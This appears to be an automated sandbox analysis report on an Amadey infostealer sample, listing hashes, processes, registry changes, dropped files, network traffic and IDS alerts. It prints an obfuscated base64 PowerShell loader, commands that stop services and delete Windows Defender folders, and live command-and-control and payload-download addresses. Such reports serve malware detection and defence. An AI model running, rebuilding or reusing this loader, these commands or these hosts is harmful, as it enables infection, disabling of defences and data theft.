| File name: | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin |
| Full analysis: | https://app.any.run/tasks/287bd51e-6fa1-4eea-bb85-247242c36829 |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | June 21, 2025, 20:14:39 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | 968DA28761C83C55811839C954F33D1D |
| SHA1: | 21B9207F6A4D87B3C463250CAAAB2471CC466525 |
| SHA256: | 097446277B4D63FD79CD4EE41EB9A66F46CF9FF5C58BD3C52D3ACFA36BFCE3E9 |
| SSDEEP: | 98304:byi3S7BnWcLIqRQVnmHrgQI9pQTGq4coKogj0YjlPuxNc64MGwQVdkDwf7fqjNtU:0Qm4ggBWabSn |
| .exe | | | Win64 Executable (generic) (64.6) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (15.4) |
| .exe | | | Win32 Executable (generic) (10.5) |
| .exe | | | Generic Win/DOS Executable (4.6) |
| .exe | | | DOS Executable Generic (4.6) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2022:03:03 13:15:57+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14.3 |
| CodeSize: | 203776 |
| InitializedDataSize: | 77312 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1f530 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 416 | find /i "0x0" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 424 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | nxTpPrk.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 436 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc4775fff8,0x7ffc47760004,0x7ffc47760010 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 133.0.6943.127 Modules
| |||||||||||||||
| 436 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,9675975907000648117,6328650334649942080,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3204 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 133.0.6943.127 Modules
| |||||||||||||||
| 472 | C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "#   k % & G G f W d 0 N c 0 S + T A j Y X | x | r . o n & s ; R [ f { P W c W 0 2 h c E 9 . k a + 3 B     4 = E T P   T m x a y b ( C K ) Q U l b W 8 @ S g L = _ - , ( w m 7 f } U T O | _ I ]   e T # l s X 8 8 ? @ s | k 7 u n 0 P 1 ; u U p { } r 3 M P E y + R 5 w m o $ f ] 9 { 0 c , 6 F . e Y D ] J 2 H { 4 N b W ^ % v [ ? o o H + * % e n A w : d o V Q Y } N j { 3 9 R ( | 9 i b { P n - r C 2 V 5 v k , E f ] h # W = > Z ^ = B   8 i ] u m + B j a d 9 f e n 8 , n C * 5 v n ? E n K ; # T G 6 J R l 5 J n < - = . + v = $ ] 6 , & b X 5 ^ h d < Y t M N ) [ v ) Q D ? D ) F E 4 I g d $ _ r e - c 4 } ! z # 4 x s v d ; n 6 U ! 8 H ] Y ] 0 Y { Y 0 # - 6 8 3 f * ; # % G t T 7 u a s X o ) v u D h O o J } G N > M 5 p C z v t [ _ 5 @ Z   & W r . k ( C _ . L I ] P & T 5 $ I z d B 2 0 V ) A # m { Q + 2 ) * ; o G p g H l I J > e 0 : > r = N a 3 X ( 1 Q 8 + V U O   b b H ] W , 1 $ z P ) F 7 - F h F R # : P } < x J _ c | F , ^ - z z @ O s E G m U B H { y D n ! f } R B 3 N + 3 3 _ I [ u B C ^ ^ ! E i # Q j o , - H u j B H 7 q G Z 3 , 1 % + ; j J A T o E y T K m } h q ] U +  
                 $ a                 =             7 4 0 8 ; $ b     =         ' C : \ U s e r s \ a d m i n \ A p p D a t a \ L o c a l \ T e m p \ t m p E 1 4 7 . t m p ' ;  
               & (               $ s h E l l i d [ 1 ] + $ S H E L l I D [ 1 3 ] + ' x ' ) (               n E w - o B j E C T         s y s t E m . I o . C o m P R E S s I O n . D E f l a T e s T R E a M ( [ i O . m e M O R y s t R E a M ]             [ c O n v E r t ] : : f r o M B A S E 6 4 s t r i n G ( ' p V T R b t o w F H 2 v x D 9 4 i I d E M s i j a J q K I p W G d q v U a h V 0 W z X E g 0 l u S T T H j h y n D S v 7 9 9 0 k Z o U u G 0 V 7 i e + N 7 X P u 9 T n 2 K A y 7 t 6 s U S P U d w 3 0 s Y x M r S U 7 b r a M 8 i + W S T F e Z g W R I t r P e J J c m T q B 3 K Q 1 o l U 5 B P 8 Q B Z M P W U Z o v R B y Q Q P A s I 3 d P J F A y M y S P p S E j j x W M s T 4 9 K 4 M B Y 9 S v / 7 y n 4 y r o M 3 p e B W 8 Z I s 3 G Q l w m q d L G a X 8 H L U E c 9 9 v u P D P c I A E U y C w J F n B j N P m U g r z R C k v I n I q r o A u l B F n R K v v h v h a v 2 u U L l c F H L k M B j i U o X o 1 g N 3 y J t c m 5 G A m h g v P i N w y 1 w a a w e u D 1 s D i s z K 8 6 N m C 7 v o Z E 6 V U D z W J l Y D Z / J l K 5 V e N A M t s P 0 h k I T G N H n 2 3 0 3 1 w X I s + i S / S N z o P S j T 4 P I v g X 4 a H i + B q 4 g Q m e m Y H b C J P w 7 w L Z n G + C R T 0 R b P L Q f X a 9 J a u a m N R G T D c K h O 6 T 3 R F 5 2 3 Y d r c / W / n q 8 P q f 3 X G R A 0 x I v v n c i z 6 v X 9 7 7 h F X M 1 m B w b q N Y M L V D i v X B Z R L e 2 0 K o A N + x d g V y a i L L i G O / a m h V 9 H D A b M M u U 7 D I 9 b d s / c o c 7 z D + r p t S Q 4 L 4 3 f 3 g i o g l 1 r C r b x A N W e U G 5 e 8 D x z S n h H 4 c l e o O 9 S / z w Z V 8 l 8 u N + 5 B K y 2 V i N V e 8 H t C I Y r 8 F N u 0 I w J N j N t 8 + 7 F s E c I k L z J H a F c 1 h Z + 5 R 0 r 7 h c 5 n w J x J 9 G X K e t o 0 7 o z X w l H 0 C b + c n J h V b J G c / g 3 W B q N D 7 s j v M B T B f n D a A A 3 Q l / J J 2 F 6 + K 1 u s P V E 2 d W n v l x f 9 7 h t B P i 7 1 8 = '           ) ,             [ s y S T e M . I o . C O m P r e S s i O N . c O m p r e S S i O n M o d e ] : : d E C o m p r e S S     ) |  
                         %                 {  
   #   < U M $ r b V , H 6 4 B q w k K 2 V A L o < J t k Z $ } f M @ O O : W ; c S J 2 B 6 | ^ l U - R I ] H } M k m 3 M c , y - % ^ d x | ( 3 n k + M O c H X 7 U q . p # | < Y i g X h 0 K c d ] 6 K ! H : y m R + 9 k   n Z b v M 9 ( n B j | c p n E h D K I z 6 O % Q = 2 l 3 3 . ( u r 8 g ] Q , R 5 a L E g = 5 Z t % S v M Z J & * R R . g & Z | Q , z o r o C l s y ) 1 M E G s 0 @ @ % a Q C r ( G n = k i k $ 7 ) 7 $ X L s N A   _ % [ i ^ * 0 w + P H > D @ 7 v p R $ : 1 L _ ^ f t M Z + w * > 7 @ * + D K +  
                         n E w - o B j E C T                           I O . s t R e a m r e a d E R (   $ _ , [ S Y S T e m . T e x t . e n c o D i N G ] : : A s c i I               ) }   |  
                 #   , * # ) 9 J e N 7 U U t | ^ j s r . L S = & j 2 y ( b % * - c g ! h M 0 y @ H 8 & } P _ l V - D V , g 3 r k e V ( } f Z [ : } _ ^ Q : % j ] o f P M v F h n f > q ; U & 0 w a 6 8 < y | M q c 4   S S i Z $ . K v 4 ] D n * O D j A { O & 0 c D ] K Z e ( D H C V q . E n M H : | e 1 = Q 0 0 = g C ] B ^ { ? v w 3 b 1 . c 8 | [ - D P f 4 U q = [ f z 3 6 W ? k F { n ? 3 m = 5 } { } b t | _ ] l p B ! q p u W m O X b C 4 F y w j c C G : y f 0 q k g L ^ 0 ( c P p % P D S 5 ] i i _ 9 d + 7 6 [ : E c X z 4 i E & G K _ ) J j I G = K . H 5 f y _ o x c i , S @ j % 1 | N & o j o + 3 n 5 G  
                 %                 {  
       #   U I M d J l g 2 n ^   k : C n : S & w ! o F u m 3 P ) M u 3 z   Q a # & H ] q O K , t u Z K G 1 = & ; 6 % I - 4 1 } $ i + [ n w d I 3 | K n ] ] P & p m U , 1 ) { > b T k X 7 c y Y ) # K N D % j j 5 f s + . t L ? $ $ + h _ N 2 D { ^ k o } 1 Z u p + D x Q U - q W ) f 2 $ T {   , n $ 2 j e 6 _ , P y ( j k C O D y ) Y I & o h F F - V v 3 V V : Q [ q Y u P m O Q S A   N 6 l T 2 9 y s F : 1 < * E ( Q < C 0 K E F > c i - G G 6 q B g 8 I # A , s ( S W l < Y < b | d G + % ? Q ) m d _ r g ] F ] [ T ; M y Q j I p   Y % y Q _ K C % C 2 J 1 N P @ c 9 < @ < u ; H d k h # q V 4 ( 4 H 8 ) F i 5 R + J 3 7 C ? K ^ t O @ 6 < % ( , { B - P O O - u ; ( V Q s > 7 U . 5 I 8 # J { g < M n 7 K 9 3 e @ D 6 l 0 ^ Q d $ a ; d C S N n g X 7 H J y d - t v z ] { , ^ l : N > r k r V U c X g 5 k I j : m ] _ & r N r ^ ) T w u e _ : [ 1 - c < > ( % H r , > v K C & T C h T { s ? e @ , _ { n # % - m z % h # = 6 U l e s ? U   R e Z < P : R F t 9 1 9 n 8 { $ b O (   E O 4 { P Z v u M b d l + 0 ] { ? { s F G 2 o n $ t ( i ? p b T % l H ) V 7 , ] { v 7 q s S W 6 Y m W 7 E o B 9 @ | ( J G i ! D @ ; A B 1 ( . m   I   | X b h i f % i Z H j T | |   w A P v w * 8 X d ) : 0 5 5 U m i } N 0 p b K 6 P # D 3 [ A F c [ 5 5 : > o R > }  
 #   0 s l T , 0 E l d B k X { T Y B e K [ 1 a = ! P ( =   X W 4 ] M W H 8 q O 2 2 X X 1 v M 1 , ? 2 X ? P 5 % f A   - ^ x C a C c = T { 9 l R t - G d L o { 9 I 8 + n B E d J r > E 0 l e 8 S _ ( n : J B y 6 G C G y D ^ { | Q L O v - > % K ; h y w n I R 8 z I 9 v % v R Y Q x N f N s l = X : j g | } 5 I , ) z - ? k I l   ^ p t h [ & d G # ] ] p & _ 0 J 8 [ J C f n B < { B R 0 P x : A > P h e E ] 0 & T 6 x S c ; [ u ? C F A p T n s k d M 9 g = h Q A c a J ) L L ? D 8 B y , ; 9 } c 7 : | ] 9 3 D g a 7 - .   w S 7 O m M d = M d 3 S d X Q ; @   ) A T ^ - N I x t H h B B I w K g d h b v 6 f o C 8 : 2 D > & Z , ) X I : 8 5 < j r - a Q | q ^ D R X , h _ . ; ; 8 { a A ) H ! a A e + @ W j & k 8 - O ! s + 1 U 2 K 4 f _ F n M Q g 7 v D X D T [ f | L @ j J   r A H - 8 a 9 4 w C S v s c A c e & Q : s 2 { Y A O w { { i + 7 A ? _ o 8 d } E ^ * H V X t - Q . - l # $ y L b n x % - ; y ] ) | x O N e k & o p 4 O M F : 3 ) d R C $ } ? @ m G > R K l * Q 1 V A d ! L Z 9 y Z ; V + 6 F [ Z J - m = u & > ; | i 4 q Z ^ [ e ( N r l O ( s k i Q b s _ = _ = W ? ^ S - . F j n w & W R s ] w v Y 2 E I k 2 ] j o U ^ M 6 i R [ $ D V V $ , [ @ i o P g D 4 # a y u d   9 : N J I Y $ L N : l 8 9 f i g | S O , d z w J O a ? | M 8 5 c ^ ( k = P 1 2 < Y A T   X G j V 8 9 v 4 5 } n p = : ( t t 7 0 k I r ( 3 h G ! X # D w { D % P m ] g ! 8 F y A $ # @   v m , 4 ^ f - M 5 o d B v G + u a K M @ r r W ^ G c . E ( > Y s S g R d Q % 0 D  
                 $ _ . R e a D T O e N d ( )           } )  | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | MSBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 480 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 516 | "C:\Temper\76EOElBE.exe" | C:\Temper\76EOElBE.exe | — | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 516 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.92 --initial-client-data=0x294,0x298,0x29c,0x288,0x2a4,0x7ffc4249f208,0x7ffc4249f214,0x7ffc4249f220 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 133.0.3065.92 Modules
| |||||||||||||||
| 592 | "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker | C:\Windows\System32\cmd.exe | — | Unlocker.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 1060 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 592 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | schtasks.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702C8 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000802C8 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000802C8 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702C8 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconLayouts |
Value: 00000000000000000000000000000000030001000100010010000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C00000010000000000000006D006F00760065006D006100700073002E006A00700067003E002000200000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C000000110000000000000061006C006F006E00670064006100740061002E0070006E0067003E00200020000000130000000000000062006F00740074006F006D006300610062006C0065002E007200740066003E0020002000000012000000000000006D0075007300650075006D006C006500730073002E006A00700067003E00200020000000110000000000000070006C00610079006300680069006E0061002E007200740066003E002000200000001500000000000000730065006E0069006F007200730075006D006D006100720079002E0070006E0067003E00200020000000120000000000000073006800610072006500610067007200650065002E006A00700067003E00200020000000140000000000000077006800650074006800650072006300680069006E0061002E007200740066003E002000200000004C0000000000000030003900370034003400360032003700370062003400640036003300660064003700390063006400340065006500340031006500620039006100360036006600340036006300660039006600660035006300350038006200640033006300350032006400330061006300660061003300360062006600630065003300650039002E00620069006E002E006500780065003E00200020000000010000000000000002000100000000000000000001000000000000000200010000000000000000001100000006000000010000001000000000000000000000000000000000000000803F0000004008000000803F000040400900000000000000404003000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E00000000000000803F01000000000000000040020000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F070000000040000040400F00 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconNameVersion |
Value: 1 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts |
| Operation: | write | Name: | LastUpdate |
Value: B912576800000000 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000C02E4 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (1180) nircmd.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
| (PID) Process: | (1180) nircmd.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\76EOElBE.exe | executable | |
MD5:849FAD50B0B67FF67A1EB27698EE2D61 | SHA256:F7304988F5311FC541E547178B90CB33C4A8F4982B2AF838A3085771035EB533 | |||
| 6520 | pJNMEHWu.exe | C:\Temper\1uP5ZkiR.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\N8z6GQBM.zip | compressed | |
MD5:D6A202BB8E3765C2B111CDC87BD2F877 | SHA256:12A8DCDCBBED85AB51429F93FCD51B72DCE1110CB3FC0942B6D1873567E0643B | |||
| 3388 | 1uP5ZkiR.exe | C:\Windows\Tasks\ramez.job | binary | |
MD5:45F7B248AEEED982B34B2025E319F009 | SHA256:8F6699775B166F1A8CC28E0C24952871E9D151434DDC4CB07831BFDCFE999568 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\7z.exe | executable | |
MD5:426CCB645E50A3143811CFA0E42E2BA6 | SHA256:CF878BFBD9ED93DC551AC038AFF8A8BBA4C935DDF8D48E62122BDDFDB3E08567 | |||
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\pJNMEHWu.exe | executable | |
MD5:426CCB645E50A3143811CFA0E42E2BA6 | SHA256:CF878BFBD9ED93DC551AC038AFF8A8BBA4C935DDF8D48E62122BDDFDB3E08567 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\cecho.exe | executable | |
MD5:E783BC59D0ED6CFBD8891F94AE23D1B3 | SHA256:5C1211559DDA10592CFEDD57681F18F4A702410816D36EDA95AEE6C74E3C6A47 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\NSudoLG.exe | executable | |
MD5:423129DDB24FB923F35B2DD5787B13DD | SHA256:5094AD359D8CF6DC5324598605C35F68519CC5AF9C7ED5427E02A6B28121E4C7 | |||
| 3388 | 1uP5ZkiR.exe | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\ARB9K2W.bat | text | |
MD5:F06B802A647D148B7104E382DC0B7ED8 | SHA256:C4B0E7467D03AB117A70EB53478AD27F4E3795678519EBF352D1550A9CB12D1D | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4708 | RUXIMICS.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4708 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4372 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | unknown |
4372 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | unknown |
— | — | GET | 200 | 23.197.130.99:443 | https://steamcommunity.com/profiles/76561199861614181 | unknown | html | 29.0 Kb | whitelisted |
4372 | ramez.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/files/7700188128/RYNH1rZ.exe | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1268 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4708 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
1268 | svchost.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
4708 | RUXIMICS.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
narrathfpt.top |
| unknown |
escczlv.top |
| unknown |
localixbiw.top |
| unknown |
korxddl.top |
| unknown |
stochalyqp.xyz |
| unknown |
diecam.top |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
4372 | ramez.exe | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |
4372 | ramez.exe | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Response |
4372 | ramez.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
4372 | ramez.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
4372 | ramez.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
4372 | ramez.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (korxddl .top) |
2200 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (peppinqikp .xyz) |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (citellcagt .top) |
Process | Message |
|---|---|
rZBRvVk.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
IObitUnlocker.exe | PostAction_Delete |
IObitUnlocker.exe | FileCount:46 |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Defender-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Security Health-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Storage Health-------- |
IObitUnlocker.exe | C:\Program Files\Windows Defender-------- |
IObitUnlocker.exe | C:\Program Files\Windows Defender Advanced Threat Protection-------- |
IObitUnlocker.exe | C:\Program Files\Windows Security-------- |